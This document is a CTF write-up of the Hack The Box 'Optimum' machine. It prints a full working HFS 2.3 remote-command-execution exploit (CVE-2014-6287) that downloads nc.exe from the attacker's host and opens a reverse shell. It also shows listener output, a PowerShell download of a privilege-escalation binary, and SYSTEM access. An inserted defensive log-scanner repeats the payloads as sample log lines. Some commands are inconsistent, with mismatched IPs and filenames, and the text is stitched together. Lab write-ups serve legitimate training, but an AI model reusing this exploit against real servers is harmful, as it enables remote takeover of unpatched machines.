Today we are going to solve another CTF challenge called “Optimum”, a retired lab developed by Hack The Box for online penetration-testing practice. Solving this lab is not that tough if you have a proper basic knowledge of penetration testing. Let’s start and learn how to breach it.
Level: Intermediate
Task: find the user.txt and root.txt files on the victim’s machine.
Since these labs are online, they have static IPs. The IP of Optimum is 10.10.10.8, so let’s start with nmap port enumeration.
C:\Users\jacco>nmap -sC -sV 10.10.10.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 20:58 W. Europe Standard Time
Nmap scan report for 10.10.10.8
Host is up (0.026s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.50 seconds
https://www.exploit-db.com/exploits/39161/
Usage: python exploit.py RHOST RPORT
root@kali:~/htb/optimum# cat rejetto-exploit.py
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#              It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#              It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
#          You may need to run it multiple times for success!

import urllib2
import sys

try:
    # each request injects an HFS template macro through the search parameter,
    # prefixed with %00 to get past the input filter
    def script_create():
        # {.save|...} writes the VBS downloader to C:\Users\Public\script.vbs
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    def execute_script():
        # {.exec|...} runs the VBS, which fetches nc.exe from our web server
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    def nc_run():
        # {.exec|...} launches nc.exe back to our listener
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "10.10.14.20" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""
root@kali:~/htb/optimum#
We need to host netcat (http://attackers_ip:80/nc.exe) on a web server, make sure the local IP and port inside the script have been changed, and then run:
root@kali:~/htb/optimum# python rejetto.py 10.10.10.8 80
root@kali:~/htb/optimum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [09/Apr/2019 09:48:39] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.8 - - [09/Apr/2019 09:48:39] "GET /nc.exe HTTP/1.1" 200 -
root@kali:~/htb/optimum# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49530.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\kostas\Desktop

15/04/2019  02:26    <DIR>          .
15/04/2019  02:26    <DIR>          ..
15/04/2019  03:34    <DIR>          %TEMP%
18/03/2017  03:11           760.320 hfs.exe
18/03/2017  03:13                32 user.txt.txt
               2 File(s)        760.352 bytes
               3 Dir(s)  31.890.731.008 bytes free

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c*****f73
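An added example from the defender's side, not part of the original write-up: the exploit above drives HFS 2.3's template macros through the search parameter, so each of its three stages leaves a request in the web server's access log. The script below parses constructed Common Log Format lines (an assumed layout; HFS's own log format may differ), URL-decodes the request target and flags `{.macro|args.}` constructs, rating exec and save (the two macros the exploit chains) as high severity and recording whether the leading %00 the exploit uses is present.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines for illustration (not from the original write-up).
# The first three mirror the exploit's three requests: drop a VBS, run it, start nc.
SAMPLE_LOG = """\
10.10.14.20 - - [09/Apr/2019:09:48:30 +0000] "GET /?search=%00{.+save|C%3A%5CUsers%5CPublic%5Cscript.vbs|dim%20xHttp.} HTTP/1.1" 200 -
10.10.14.20 - - [09/Apr/2019:09:48:31 +0000] "GET /?search=%00{.+exec|cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs.} HTTP/1.1" 200 -
10.10.14.20 - - [09/Apr/2019:09:48:32 +0000] "GET /?search=%00{.+exec|C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%2010.10.14.20%20443.} HTTP/1.1" 200 -
10.10.14.21 - - [09/Apr/2019:09:50:00 +0000] "GET /?search=report.pdf HTTP/1.1" 200 -
10.10.14.22 - - [09/Apr/2019:09:51:10 +0000] "GET /?search=%7B.exec%7Cwhoami.%7D HTTP/1.1" 200 -
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# HFS macro syntax {.name|arg|arg.}; the exploit injects it via ?search= with a leading %00
MACRO_RE = re.compile(r'\{\.\s*\+?\s*([A-Za-z_]+)(?:\|([^}]*))?\.\}')
HIGH_RISK = {"exec", "save"}   # the two macros the exploit chains: write a file, then run it

def parse_line(line):
    """Parse one CLF line into a dict; URL-decode the request target once."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote(rec["target"])   # %00 -> "\x00", %7B -> "{", %7C -> "|"
    return rec

def inspect(line):
    """Return a finding for a line that carries HFS macro syntax, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    null_byte = "\x00" in rec["decoded"]      # the filter bypass the exploit relies on
    findings = [{"macro": name.lower(), "args": args,
                 "severity": "high" if name.lower() in HIGH_RISK else "medium",
                 "null_byte": null_byte}
                for name, args in MACRO_RE.findall(rec["decoded"])]
    if not findings:
        return None
    return {"src": rec["src"], "ts": rec["ts"], "findings": findings}

def scan(log_text):
    """Run inspect() over every line and keep only the hits."""
    return [hit for hit in map(inspect, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["src"], hit["ts"], [(f["macro"], f["severity"], f["null_byte"]) for f in hit["findings"]])
```

The same check can run on a reverse proxy or IDS in front of HFS; the null_byte flag separates the CVE-2014-6287 bypass from a plain macro probe like the last sample line.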
root@kali:/opt/Windows-Exploit-Suggester# apt-get install python-xlrd
Reading package lists... Done
root@kali:/opt/Windows-Exploit-Suggester# ./windows-exploit-suggester.py -d 2019-05-20-mssb.xls -i systeminfooptimum.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
--snip--
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*]
[*] done
Privesc
Windows Exploit Suggester flagged MS16-098 (exploit-db 41020), so we fetch the compiled exploit onto the box with PowerShell and run it from the reverse shell.
C:\Users\kostas\Desktop>powershell -c "Invoke-WebRequest -Uri http://10.10.14.20/ms16-098.exe -OutFile C:\Users\kostas\Desktop\puck.exe"
powershell -c "Invoke-WebRequest -Uri http://10.10.14.15/41020.exe -OutFile C:\Users\kostas\Desktop\puck.exe"

C:\Users\kostas\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\kostas\Desktop

13/02/2019  06:43    <DIR>          .
13/02/2019  06:43    <DIR>          ..
13/02/2019  01:56    <DIR>          %TEMP%
18/03/2017  02:11           760.320 hfs.exe
13/02/2019  06:44           560.128 puck.exe
18/03/2017  02:13                32 user.txt.txt
               6 File(s)      2.029.687 bytes
               3 Dir(s)  31.859.699.712 bytes free

C:\Users\kostas\Desktop>puck.exe
puck.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

C:\Users\kostas\Desktop>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
51e*****eed
Author: Puckiestyle